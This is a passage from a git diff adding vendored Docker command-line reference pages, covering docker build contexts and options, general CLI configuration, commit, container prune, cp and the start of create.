--force-rm Always remove intermediate containers + --help Print usage + --isolation string Container isolation technology + --label value Set metadata for 
an image (default []) + -m, --memory string Memory limit + --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap + --network string Set the networking mode for the RUN instructions during build + 'bridge': use default Docker bridge + 'none': no networking + 'container:<name|id>': reuse another container's network stack + 'host': use the Docker host network stack + '<network-name>|<network-id>': connect to a user-defined network + --no-cache Do not use cache when building the image + --pull Always attempt to pull a newer version of the image + -q, --quiet Suppress the build output and print image ID on success + --rm Remove intermediate containers after a successful build (default true) + --security-opt value Security Options (default []) + --shm-size string Size of /dev/shm, default value is 64MB. + The format is `<number><unit>`. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), + or `g` (gigabytes). If you omit the unit, the system uses bytes. + --squash Squash newly built layers into a single new layer (**Experimental Only**) + -t, --tag value Name and optionally a tag in the 'name:tag' format (default []) + --ulimit value Ulimit options (default []) +``` + +Builds Docker images from a Dockerfile and a "context". A build's context is +the files located in the specified `PATH` or `URL`. The build process can refer +to any of the files in the context. For example, your build can use an +[*ADD*](../builder.md#add) instruction to reference a file in the +context. + +The `URL` parameter can refer to three kinds of resources: Git repositories, +pre-packaged tarball contexts and plain text files. + +### Git repositories + +When the `URL` parameter points to the location of a Git repository, the +repository acts as the build context. The system recursively clones the +repository and its submodules using a `git clone --depth 1 --recursive` +command. This command runs in a temporary directory on your local host.
After +the command succeeds, the directory is sent to the Docker daemon as the +context. Local clones give you the ability to access private repositories using +local user credentials, VPN's, and so forth. + +Git URLs accept context configuration in their fragment section, separated by a +colon `:`. The first part represents the reference that Git will check out, +this can be either a branch, a tag, or a commit SHA. The second part represents +a subdirectory inside the repository that will be used as a build context. + +For example, run this command to use a directory called `docker` in the branch +`container`: + +```bash +$ docker build https://github.com/docker/rootfs.git#container:docker +``` + +The following table represents all the valid suffixes with their build +contexts: + +Build Syntax Suffix | Commit Used | Build Context Used +--------------------------------|-----------------------|------------------- +`myrepo.git` | `refs/heads/master` | `/` +`myrepo.git#mytag` | `refs/tags/mytag` | `/` +`myrepo.git#mybranch` | `refs/heads/mybranch` | `/` +`myrepo.git#abcdef` | `sha1 = abcdef` | `/` +`myrepo.git#:myfolder` | `refs/heads/master` | `/myfolder` +`myrepo.git#master:myfolder` | `refs/heads/master` | `/myfolder` +`myrepo.git#mytag:myfolder` | `refs/tags/mytag` | `/myfolder` +`myrepo.git#mybranch:myfolder` | `refs/heads/mybranch` | `/myfolder` +`myrepo.git#abcdef:myfolder` | `sha1 = abcdef` | `/myfolder` + + +### Tarball contexts + +If you pass an URL to a remote tarball, the URL itself is sent to the daemon: + +Instead of specifying a context, you can pass a single Dockerfile in the `URL` +or pipe the file in via `STDIN`. To pipe a Dockerfile from `STDIN`: + +```bash +$ docker build http://server/context.tar.gz +``` + +The download operation will be performed on the host the Docker daemon is +running on, which is not necessarily the same host from which the build command +is being issued. 
The Docker daemon will fetch `context.tar.gz` and use it as the +build context. Tarball contexts must be tar archives conforming to the standard +`tar` UNIX format and can be compressed with any one of the 'xz', 'bzip2', +'gzip' or 'identity' (no compression) formats. + +### Text files + +Instead of specifying a context, you can pass a single `Dockerfile` in the +`URL` or pipe the file in via `STDIN`. To pipe a `Dockerfile` from `STDIN`: + +```bash +$ docker build - < Dockerfile +``` + +With Powershell on Windows, you can run: + +```powershell +Get-Content Dockerfile | docker build - +``` + +If you use `STDIN` or specify a `URL` pointing to a plain text file, the system +places the contents into a file called `Dockerfile`, and any `-f`, `--file` +option is ignored. In this scenario, there is no context. + +By default the `docker build` command will look for a `Dockerfile` at the root +of the build context. The `-f`, `--file`, option lets you specify the path to +an alternative file to use instead. This is useful in cases where the same set +of files are used for multiple builds. The path must be to a file within the +build context. If a relative path is specified then it is interpreted as +relative to the root of the context. + +In most cases, it's best to put each Dockerfile in an empty directory. Then, +add to that directory only the files needed for building the Dockerfile. To +increase the build's performance, you can exclude files and directories by +adding a `.dockerignore` file to that directory as well. For information on +creating one, see the [.dockerignore file](../builder.md#dockerignore-file). + +If the Docker client loses connection to the daemon, the build is canceled. +This happens if you interrupt the Docker client with `CTRL-c` or if the Docker +client is killed for any reason. If the build initiated a pull which is still +running at the time the build is cancelled, the pull is cancelled as well. 
+ +## Return code + +On a successful build, a return code of success `0` will be returned. When the +build fails, a non-zero failure code will be returned. + +There should be informational output of the reason for failure output to +`STDERR`: + +```bash +$ docker build -t fail . + +Sending build context to Docker daemon 2.048 kB +Sending build context to Docker daemon +Step 1/3 : FROM busybox + ---> 4986bf8c1536 +Step 2/3 : RUN exit 13 + ---> Running in e26670ec7a0a +INFO[0000] The command [/bin/sh -c exit 13] returned a non-zero code: 13 +$ echo $? +1 +``` + +See also: + +[*Dockerfile Reference*](../builder.md). + +## Examples + +### Build with PATH + +```bash +$ docker build . + +Uploading context 10240 bytes +Step 1/3 : FROM busybox +Pulling repository busybox + ---> e9aa60c60128MB/2.284 MB (100%) endpoint: https://cdn-registry-1.docker.io/v1/ +Step 2/3 : RUN ls -lh / + ---> Running in 9c9e81692ae9 +total 24 +drwxr-xr-x 2 root root 4.0K Mar 12 2013 bin +drwxr-xr-x 5 root root 4.0K Oct 19 00:19 dev +drwxr-xr-x 2 root root 4.0K Oct 19 00:19 etc +drwxr-xr-x 2 root root 4.0K Nov 15 23:34 lib +lrwxrwxrwx 1 root root 3 Mar 12 2013 lib64 -> lib +dr-xr-xr-x 116 root root 0 Nov 15 23:34 proc +lrwxrwxrwx 1 root root 3 Mar 12 2013 sbin -> bin +dr-xr-xr-x 13 root root 0 Nov 15 23:34 sys +drwxr-xr-x 2 root root 4.0K Mar 12 2013 tmp +drwxr-xr-x 2 root root 4.0K Nov 15 23:34 usr + ---> b35f4035db3f +Step 3/3 : CMD echo Hello world + ---> Running in 02071fceb21b + ---> f52f38b7823e +Successfully built f52f38b7823e +Removing intermediate container 9c9e81692ae9 +Removing intermediate container 02071fceb21b +``` + +This example specifies that the `PATH` is `.`, and so all the files in the +local directory get `tar`d and sent to the Docker daemon. The `PATH` specifies +where to find the files for the "context" of the build on the Docker daemon. 
+Remember that the daemon could be running on a remote machine and that no +parsing of the Dockerfile happens at the client side (where you're running +`docker build`). That means that *all* the files at `PATH` get sent, not just +the ones listed to [*ADD*](../builder.md#add) in the Dockerfile. + +The transfer of context from the local machine to the Docker daemon is what the +`docker` client means when you see the "Sending build context" message. + +If you wish to keep the intermediate containers after the build is complete, +you must use `--rm=false`. This does not affect the build cache. + +### Build with URL + +```bash +$ docker build github.com/creack/docker-firefox +``` + +This will clone the GitHub repository and use the cloned repository as context. +The Dockerfile at the root of the repository is used as Dockerfile. You can +specify an arbitrary Git repository by using the `git://` or `git@` scheme. + +```bash +$ docker build -f ctx/Dockerfile http://server/ctx.tar.gz + +Downloading context: http://server/ctx.tar.gz [===================>] 240 B/240 B +Step 1/3 : FROM busybox + ---> 8c2e06607696 +Step 2/3 : ADD ctx/container.cfg / + ---> e7829950cee3 +Removing intermediate container b35224abf821 +Step 3/3 : CMD /bin/ls + ---> Running in fbc63d321d73 + ---> 3286931702ad +Removing intermediate container fbc63d321d73 +Successfully built 377c409b35e4 +``` + +This sends the URL `http://server/ctx.tar.gz` to the Docker daemon, which +downloads and extracts the referenced tarball. The `-f ctx/Dockerfile` +parameter specifies a path inside `ctx.tar.gz` to the `Dockerfile` that is used +to build the image. Any `ADD` commands in that `Dockerfile` that refer to local +paths must be relative to the root of the contents inside `ctx.tar.gz`. In the +example above, the tarball contains a directory `ctx/`, so the `ADD +ctx/container.cfg /` operation works as expected. 
+ +### Build with - + +```bash +$ docker build - < Dockerfile +``` + +This will read a Dockerfile from `STDIN` without context. Due to the lack of a +context, no contents of any local directory will be sent to the Docker daemon. +Since there is no context, a Dockerfile `ADD` only works if it refers to a +remote URL. + +```bash +$ docker build - < context.tar.gz +``` + +This will build an image for a compressed context read from `STDIN`. Supported +formats are: bzip2, gzip and xz. + +### Usage of .dockerignore + +```bash +$ docker build . + +Uploading context 18.829 MB +Uploading context +Step 1/2 : FROM busybox + ---> 769b9341d937 +Step 2/2 : CMD echo Hello world + ---> Using cache + ---> 99cc1ad10469 +Successfully built 99cc1ad10469 +$ echo ".git" > .dockerignore +$ docker build . +Uploading context 6.76 MB +Uploading context +Step 1/2 : FROM busybox + ---> 769b9341d937 +Step 2/2 : CMD echo Hello world + ---> Using cache + ---> 99cc1ad10469 +Successfully built 99cc1ad10469 +``` + +This example shows the use of the `.dockerignore` file to exclude the `.git` +directory from the context. Its effect can be seen in the changed size of the +uploaded context. The builder reference contains detailed information on +[creating a .dockerignore file](../builder.md#dockerignore-file) + +### Tag image (-t) + +```bash +$ docker build -t vieux/apache:2.0 . +``` + +This will build like the previous example, but it will then tag the resulting +image. The repository name will be `vieux/apache` and the tag will be `2.0`. +[Read more about valid tags](tag.md). + +You can apply multiple tags to an image. For example, you can apply the `latest` +tag to a newly built image and add another tag that references a specific +version. +For example, to tag an image both as `whenry/fedora-jboss:latest` and +`whenry/fedora-jboss:v2.1`, use the following: + +```bash +$ docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 . 
+``` +### Specify Dockerfile (-f) + +```bash +$ docker build -f Dockerfile.debug . +``` + +This will use a file called `Dockerfile.debug` for the build instructions +instead of `Dockerfile`. + +```bash +$ docker build -f dockerfiles/Dockerfile.debug -t myapp_debug . +$ docker build -f dockerfiles/Dockerfile.prod -t myapp_prod . +``` + +The above commands will build the current build context (as specified by the +`.`) twice, once using a debug version of a `Dockerfile` and once using a +production version. + +```bash +$ cd /home/me/myapp/some/dir/really/deep +$ docker build -f /home/me/myapp/dockerfiles/debug /home/me/myapp +$ docker build -f ../../../../dockerfiles/debug /home/me/myapp +``` + +These two `docker build` commands do the exact same thing. They both use the +contents of the `debug` file instead of looking for a `Dockerfile` and will use +`/home/me/myapp` as the root of the build context. Note that `debug` is in the +directory structure of the build context, regardless of how you refer to it on +the command line. + +> **Note:** +> `docker build` will return a `no such file or directory` error if the +> file or directory does not exist in the uploaded context. This may +> happen if there is no context, or if you specify a file that is +> elsewhere on the Host system. The context is limited to the current +> directory (and its children) for security reasons, and to ensure +> repeatable builds on remote Docker hosts. This is also the reason why +> `ADD ../file` will not work. + +### Optional parent cgroup (--cgroup-parent) + +When `docker build` is run with the `--cgroup-parent` option the containers +used in the build will be run with the [corresponding `docker run` +flag](../run.md#specifying-custom-cgroups). + +### Set ulimits in container (--ulimit) + +Using the `--ulimit` option with `docker build` will cause each build step's +container to be started using those [`--ulimit` +flag values](./run.md#set-ulimits-in-container-ulimit). 
+ +### Set build-time variables (--build-arg) + +You can use `ENV` instructions in a Dockerfile to define variable +values. These values persist in the built image. However, often +persistence is not what you want. Users want to specify variables differently +depending on which host they build an image on. + +A good example is `http_proxy` or source versions for pulling intermediate +files. The `ARG` instruction lets Dockerfile authors define values that users +can set at build-time using the `--build-arg` flag: + +```bash +$ docker build --build-arg HTTP_PROXY=http://10.20.30.2:1234 . +``` + +This flag allows you to pass the build-time variables that are +accessed like regular environment variables in the `RUN` instruction of the +Dockerfile. Also, these values don't persist in the intermediate or final images +like `ENV` values do. + +Using this flag will not alter the output you see when the `ARG` lines from the +Dockerfile are echoed during the build process. + +For detailed information on using `ARG` and `ENV` instructions, see the +[Dockerfile reference](../builder.md). + +### Optional security options (--security-opt) + +This flag is only supported on a daemon running on Windows, and only supports +the `credentialspec` option. The `credentialspec` must be in the format +`file://spec.txt` or `registry://keyname`. + +### Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Windows. The `--isolation=<value>` option sets a container's isolation +technology. On Linux, the only supported value is `default`, which uses +Linux namespaces. On Microsoft Windows, you can specify these values: + + +| Value | Description | +|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `default` | Use the value specified by the Docker daemon's `--exec-opt` .
If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. | + `process` | Namespace isolation only. | + `hyperv` | Hyper-V hypervisor partition-based isolation. | + +Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. + + +### Squash an image's layers (--squash) **Experimental Only** + +Once the image is built, squash the new layers into a new image with a single +new layer. Squashing does not destroy any existing image, rather it creates a new +image with the content of the squashed layers. This effectively makes it look +like all `Dockerfile` commands were created with a single layer. The build +cache is preserved with this method. + +**Note**: using this option means the new image will not be able to take +advantage of layer sharing with other images and may use significantly more +space. + +**Note**: using this option you may see significantly more space used due to +storing two copies of the image, one for the build cache with all the cache +layers intact, and one for the squashed version. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md new file mode 100644 index 0000000000..e56fb9f847 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md @@ -0,0 +1,249 @@ +--- +title: "Use the Docker command line" +description: "Docker's CLI command description and usage" +keywords: "Docker, Docker documentation, CLI, command line" +--- + + + +# Use the Docker command line + +To list available commands, either run `docker` with no parameters +or execute `docker help`: + +```bash +$ docker +Usage: docker [OPTIONS] COMMAND [ARG...] + docker [ --help | -v | --version ] + +A self-sufficient runtime for containers.
+ +Options: + --config string Location of client config files (default "/root/.docker") + -D, --debug Enable debug mode + --help Print usage + -H, --host value Daemon socket(s) to connect to (default []) + -l, --log-level string Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info") + --tls Use TLS; implied by --tlsverify + --tlscacert string Trust certs signed only by this CA (default "/root/.docker/ca.pem") + --tlscert string Path to TLS certificate file (default "/root/.docker/cert.pem") + --tlskey string Path to TLS key file (default "/root/.docker/key.pem") + --tlsverify Use TLS and verify the remote + -v, --version Print version information and quit + +Commands: + attach Attach to a running container + # […] +``` + +Depending on your Docker system configuration, you may be required to preface +each `docker` command with `sudo`. To avoid having to use `sudo` with the +`docker` command, your system administrator can create a Unix group called +`docker` and add users to it. + +For more information about installing Docker or `sudo` configuration, refer to +the [installation](https://docs.docker.com/engine/installation/) instructions for your operating system. + +## Environment variables + +For easy reference, the following list of environment variables are supported +by the `docker` command line: + +* `DOCKER_API_VERSION` The API version to use (e.g. `1.19`) +* `DOCKER_CONFIG` The location of your client configuration files. +* `DOCKER_CERT_PATH` The location of your authentication keys. +* `DOCKER_DRIVER` The graph driver to use. +* `DOCKER_HOST` Daemon socket to connect to. +* `DOCKER_NOWARN_KERNEL_VERSION` Prevent warnings that your Linux kernel is + unsuitable for Docker. +* `DOCKER_RAMDISK` If set this will disable 'pivot_root'. +* `DOCKER_TLS_VERIFY` When set Docker uses TLS and verifies the remote. +* `DOCKER_CONTENT_TRUST` When set Docker uses notary to sign and verify images. 
+ Equates to `--disable-content-trust=false` for build, create, pull, push, run. +* `DOCKER_CONTENT_TRUST_SERVER` The URL of the Notary server to use. This defaults + to the same URL as the registry. +* `DOCKER_HIDE_LEGACY_COMMANDS` When set, Docker hides "legacy" top-level commands (such as `docker rm`, and + `docker pull`) in `docker help` output, and only `Management commands` per object-type (e.g., `docker container`) are + printed. This may become the default in a future release, at which point this environment-variable is removed. +* `DOCKER_TMPDIR` Location for temporary Docker files. + +Because Docker is developed using Go, you can also use any environment +variables used by the Go runtime. In particular, you may find these useful: + +* `HTTP_PROXY` +* `HTTPS_PROXY` +* `NO_PROXY` + +These Go environment variables are case-insensitive. See the +[Go specification](http://golang.org/pkg/net/http/) for details on these +variables. + +## Configuration files + +By default, the Docker command line stores its configuration files in a +directory called `.docker` within your `$HOME` directory. However, you can +specify a different location via the `DOCKER_CONFIG` environment variable +or the `--config` command line option. If both are specified, then the +`--config` option overrides the `DOCKER_CONFIG` environment variable. +For example: + + docker --config ~/testconfigs/ ps + +Instructs Docker to use the configuration files in your `~/testconfigs/` +directory when running the `ps` command. + +Docker manages most of the files in the configuration directory +and you should not modify them. However, you *can modify* the +`config.json` file to control certain aspects of how the `docker` +command behaves. + +Currently, you can modify the `docker` command behavior using environment +variables or command-line options. You can also use options within +`config.json` to modify some of the same behavior. 
When using these
+mechanisms, you must keep in mind the order of precedence among them. Command
+line options override environment variables and environment variables override
+properties you specify in a `config.json` file.
+
+The `config.json` file stores a JSON encoding of several properties:
+
+The property `HttpHeaders` specifies a set of headers to include in all messages
+sent from the Docker client to the daemon. Docker does not try to interpret or
+understand these headers; it simply puts them into the messages. Docker does
+not allow these headers to change any headers it sets for itself.
+
+The property `psFormat` specifies the default format for `docker ps` output.
+When the `--format` flag is not provided with the `docker ps` command,
+Docker's client uses this property. If this property is not set, the client
+falls back to the default table format. For a list of supported formatting
+directives, see the
+[**Formatting** section in the `docker ps` documentation](ps.md)
+
+The property `imagesFormat` specifies the default format for `docker images` output.
+When the `--format` flag is not provided with the `docker images` command,
+Docker's client uses this property. If this property is not set, the client
+falls back to the default table format. For a list of supported formatting
+directives, see the [**Formatting** section in the `docker images` documentation](images.md)
+
+The property `serviceInspectFormat` specifies the default format for `docker
+service inspect` output. When the `--format` flag is not provided with the
+`docker service inspect` command, Docker's client uses this property. If this
+property is not set, the client falls back to the default json format. For a
+list of supported formatting directives, see the
+[**Formatting** section in the `docker service inspect` documentation](service_inspect.md)
+
+The property `statsFormat` specifies the default format for `docker
+stats` output. 
When the `--format` flag is not provided with the +`docker stats` command, Docker's client uses this property. If this +property is not set, the client falls back to the default table +format. For a list of supported formatting directives, see +[**Formatting** section in the `docker stats` documentation](stats.md) + +Once attached to a container, users detach from it and leave it running using +the using `CTRL-p CTRL-q` key sequence. This detach key sequence is customizable +using the `detachKeys` property. Specify a `` value for the +property. The format of the `` is a comma-separated list of either +a letter [a-Z], or the `ctrl-` combined with any of the following: + +* `a-z` (a single lowercase alpha character ) +* `@` (at sign) +* `[` (left bracket) +* `\\` (two backward slashes) +* `_` (underscore) +* `^` (caret) + +Your customization applies to all containers started in with your Docker client. +Users can override your custom or the default key sequence on a per-container +basis. To do this, the user specifies the `--detach-keys` flag with the `docker +attach`, `docker exec`, `docker run` or `docker start` command. + +Following is a sample `config.json` file: + + {% raw %} + { + "HttpHeaders": { + "MyHeader": "MyValue" + }, + "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}", + "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}", + "statsFormat": "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}", + "serviceInspectFormat": "pretty", + "detachKeys": "ctrl-e,e" + } + {% endraw %} + +### Notary + +If using your own notary server and a self-signed certificate or an internal +Certificate Authority, you need to place the certificate at +`tls//ca.crt` in your docker config directory. + +Alternatively you can trust the certificate globally by adding it to your system's +list of root Certificate Authorities. + +## Help + +To list the help on any command just execute the command, followed by the +`--help` option. 
+ + $ docker run --help + + Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] + + Run a command in a new container + + Options: + --add-host value Add a custom host-to-IP mapping (host:ip) (default []) + -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) + ... + +## Option types + +Single character command line options can be combined, so rather than +typing `docker run -i -t --name test busybox sh`, +you can write `docker run -it --name test busybox sh`. + +### Boolean + +Boolean options take the form `-d=false`. The value you see in the help text is +the default value which is set if you do **not** specify that flag. If you +specify a Boolean flag without a value, this will set the flag to `true`, +irrespective of the default value. + +For example, running `docker run -d` will set the value to `true`, so your +container **will** run in "detached" mode, in the background. + +Options which default to `true` (e.g., `docker build --rm=true`) can only be +set to the non-default value by explicitly setting them to `false`: + + $ docker build --rm=false . + +### Multi + +You can specify options like `-a=[]` multiple times in a single command line, +for example in these commands: + + $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash + $ docker run -a stdin -a stdout -a stderr ubuntu /bin/ls + +Sometimes, multiple options can call for a more complex value string as for +`-v`: + + $ docker run -v /host:/container example/mysql + +> **Note:** +> Do not use the `-t` and `-a stderr` options together due to +> limitations in the `pty` implementation. All `stderr` in `pty` mode +> simply goes to `stdout`. + +### Strings and Integers + +Options like `--name=""` expect a string, and they +can only be specified once. Options like `-c=0` +expect an integer, and they can only be specified once. 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md new file mode 100644 index 0000000000..8f971a5d95 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md @@ -0,0 +1,93 @@ +--- +title: "commit" +description: "The commit command description and usage" +keywords: "commit, file, changes" +--- + + + +# commit + +```markdown +Usage: docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]] + +Create a new image from a container's changes + +Options: + -a, --author string Author (e.g., "John Hannibal Smith ") + -c, --change value Apply Dockerfile instruction to the created image (default []) + --help Print usage + -m, --message string Commit message + -p, --pause Pause container during commit (default true) +``` + +It can be useful to commit a container's file changes or settings into a new +image. This allows you debug a container by running an interactive shell, or to +export a working dataset to another server. Generally, it is better to use +Dockerfiles to manage your images in a documented and maintainable way. +[Read more about valid image names and tags](tag.md). + +The commit operation will not include any data contained in +volumes mounted inside the container. + +By default, the container being committed and its processes will be paused +while the image is committed. This reduces the likelihood of encountering data +corruption during the process of creating the commit. If this behavior is +undesired, set the `--pause` option to false. + +The `--change` option will apply `Dockerfile` instructions to the image that is +created. 
Supported `Dockerfile` instructions: +`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` + +## Commit a container + + $ docker ps + ID IMAGE COMMAND CREATED STATUS PORTS + c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + $ docker commit c3f279d17e0a svendowideit/testimage:version3 + f5283438590d + $ docker images + REPOSITORY TAG ID CREATED SIZE + svendowideit/testimage version3 f5283438590d 16 seconds ago 335.7 MB + +## Commit a container with new configurations + + {% raw %} + $ docker ps + ID IMAGE COMMAND CREATED STATUS PORTS + c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + $ docker inspect -f "{{ .Config.Env }}" c3f279d17e0a + [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin] + $ docker commit --change "ENV DEBUG true" c3f279d17e0a svendowideit/testimage:version3 + f5283438590d + $ docker inspect -f "{{ .Config.Env }}" f5283438590d + [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin DEBUG=true] + {% endraw %} + +## Commit a container with new `CMD` and `EXPOSE` instructions + + $ docker ps + ID IMAGE COMMAND CREATED STATUS PORTS + c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + + $ docker commit --change='CMD ["apachectl", "-DFOREGROUND"]' -c "EXPOSE 80" c3f279d17e0a svendowideit/testimage:version4 + f5283438590d + + $ docker run -d svendowideit/testimage:version4 + 89373736e2e7f00bc149bd783073ac43d0507da250e999f3f1036e0db60817c0 + + $ docker ps + ID IMAGE COMMAND CREATED STATUS PORTS + 89373736e2e7 testimage:version4 "apachectl -DFOREGROU" 3 seconds ago Up 2 seconds 80/tcp + c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours diff --git 
a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md new file mode 100644 index 0000000000..43156406ec --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md @@ -0,0 +1,47 @@ +--- +title: "container prune" +description: "Remove all stopped containers" +keywords: container, prune, delete, remove +--- + + + +# container prune + +```markdown +Usage: docker container prune [OPTIONS] + +Remove all stopped containers + +Options: + -f, --force Do not prompt for confirmation + --help Print usage +``` + +## Examples + +```bash +$ docker container prune +WARNING! This will remove all stopped containers. +Are you sure you want to continue? [y/N] y +Deleted Containers: +4a7f7eebae0f63178aff7eb0aa39cd3f0627a203ab2df258c1a00b456cf20063 +f98f9c2aa1eaf727e4ec9c0283bc7d4aa4762fbdba7f26191f26c97f64090360 + +Total reclaimed space: 212 B +``` + +## Related information + +* [system df](system_df.md) +* [volume prune](volume_prune.md) +* [image prune](image_prune.md) +* [network prune](network_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md new file mode 100644 index 0000000000..fcfd35fce1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md @@ -0,0 +1,112 @@ +--- +title: "cp" +description: "The cp command description and usage" +keywords: "copy, container, files, folders" +--- + + + +# cp + +```markdown +Usage: docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|- + docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH + +Copy files/folders between a container and the local filesystem + +Use '-' as the source to read a tar archive from stdin +and extract it to a directory destination in a container. 
+Use '-' as the destination to stream a tar archive of a +container source to stdout. + +Options: + -L, --follow-link Always follow symbol link in SRC_PATH + --help Print usage +``` + +The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`. +You can copy from the container's file system to the local machine or the +reverse, from the local filesystem to the container. If `-` is specified for +either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from +`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container. +The `SRC_PATH` or `DEST_PATH` can be a file or directory. + +The `docker cp` command assumes container paths are relative to the container's +`/` (root) directory. This means supplying the initial forward slash is optional; +The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and +`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can +be an absolute or relative value. The command interprets a local machine's +relative paths as relative to the current working directory where `docker cp` is +run. + +The `cp` command behaves like the Unix `cp -a` command in that directories are +copied recursively with permissions preserved if possible. Ownership is set to +the user and primary group at the destination. For example, files copied to a +container are created with `UID:GID` of the root user. Files copied to the local +machine are created with the `UID:GID` of the user which invoked the `docker cp` +command. If you specify the `-L` option, `docker cp` follows any symbolic link +in the `SRC_PATH`. `docker cp` does *not* create parent directories for +`DEST_PATH` if they do not exist. 
+ +Assuming a path separator of `/`, a first argument of `SRC_PATH` and second +argument of `DEST_PATH`, the behavior is as follows: + +- `SRC_PATH` specifies a file + - `DEST_PATH` does not exist + - the file is saved to a file created at `DEST_PATH` + - `DEST_PATH` does not exist and ends with `/` + - Error condition: the destination directory must exist. + - `DEST_PATH` exists and is a file + - the destination is overwritten with the source file's contents + - `DEST_PATH` exists and is a directory + - the file is copied into this directory using the basename from + `SRC_PATH` +- `SRC_PATH` specifies a directory + - `DEST_PATH` does not exist + - `DEST_PATH` is created as a directory and the *contents* of the source + directory are copied into this directory + - `DEST_PATH` exists and is a file + - Error condition: cannot copy a directory to a file + - `DEST_PATH` exists and is a directory + - `SRC_PATH` does not end with `/.` + - the source directory is copied into this directory + - `SRC_PATH` does end with `/.` + - the *content* of the source directory is copied into this + directory + +The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above +rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not +the target, is copied by default. To copy the link target and not the link, specify +the `-L` option. + +A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can +also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local +machine, for example `file:name.txt`. If you use a `:` in a local machine path, +you must be explicit with a relative or absolute path, for example: + + `/path/to/file:name.txt` or `./file:name.txt` + +It is not possible to copy certain system files such as resources under +`/proc`, `/sys`, `/dev`, [tmpfs](run.md#mount-tmpfs-tmpfs), and mounts created by +the user in the container. However, you can still copy such files by manually +running `tar` in `docker exec`. 
For example (consider `SRC_PATH` and `DEST_PATH` +are directories): + + $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH - + +or + + $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH - + + +Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive. +The command extracts the content of the tar to the `DEST_PATH` in container's +filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as +the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/create.md b/vendor/github.com/docker/docker/docs/reference/commandline/create.md new file mode 100644 index 0000000000..e6582e4a38 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/create.md @@ -0,0 +1,211 @@ +--- +title: "create" +description: "The create command description and usage" +keywords: "docker, create, container" +--- + + + +# create + +Creates a new container. + +```markdown +Usage: docker create [OPTIONS] IMAGE [COMMAND] [ARG...] + +Create a new container + +Options: + --add-host value Add a custom host-to-IP mapping (host:ip) (default []) + -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) + --blkio-weight value Block IO (relative weight), between 10 and 1000 + --blkio-weight-device value Block IO weight (relative device weight) (default []) + --cap-add value Add Linux capabilities (default []) + --cap-drop value Drop Linux capabilities (default []) + --cgroup-parent string Optional parent cgroup for the container + --cidfile string Write the container ID to the file + --cpu-count int The number of CPUs available for execution by the container. + Windows daemon only. On Windows Server containers, this is + approximated as a percentage of total CPU usage. 
